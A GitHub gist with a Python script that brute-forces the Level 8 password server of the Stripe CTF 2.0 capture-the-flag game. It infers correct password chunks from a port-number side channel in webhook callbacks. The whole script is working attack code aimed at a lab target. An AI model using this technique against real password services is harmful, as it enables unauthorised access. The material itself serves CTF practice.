Created
December 8, 2012 20:56
-
-
Save lukesteensen/4241895 to your computer and use it in GitHub Desktop.
Script to brute force Level 8 of the Stripe CTF 2.0
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import sys | |
import json | |
import socket | |
import requests | |
from time import sleep | |
# set up a socket for accepting webhook responses | |
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) | |
s.bind(("0.0.0.0", 9000)) | |
s.settimeout(2) | |
s.listen(1) | |
# checks password with vault server at localhost:3000 | |
# uses the socket we just set up at port 9000 for webhook | |
# returns difference in ports and last port used | |
def check_password(password, last_port): | |
data = { 'password': password, | |
'webhooks': ['localhost:9000'] } | |
r = requests.post("http://localhost:3000", data=json.dumps(data)) | |
if '"success": true' in r.text: | |
print "flag is", password | |
sys.exit() | |
client, (host, port) = s.accept() | |
client.close() | |
difference = port - last_port | |
return difference, port | |
# concatenate our chunks array into a string | |
def cat(chunks): | |
return ''.join(str(x).zfill(3) for x in chunks) | |
last_port = 0 # initialize to 0 so that first run is ignored | |
chunk = [ 000, 000, 000, 000 ] # chunked password we want to check | |
baseline = 3 # initialize to port difference when no chunks are correct | |
i = 0 # chunk we are currently working on | |
verify = 0 # number of times this chunk has returned good response | |
while i < len(chunk): | |
difference, last_port = check_password(cat(chunk), last_port) | |
print "trying", cat(chunk), "- difference is", difference | |
if difference == baseline: # chunk is bad | |
chunk[i] = (chunk[i] + 1) % 1000 | |
verify = 0 | |
elif difference == baseline + 1: # chunk seems good | |
if verify > 2: # requiring more verification is more reliable | |
print "chunk", i, "is", chunk[i] | |
i += 1 | |
baseline += 1 | |
verify = 0 | |
else: | |
verify += 1 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment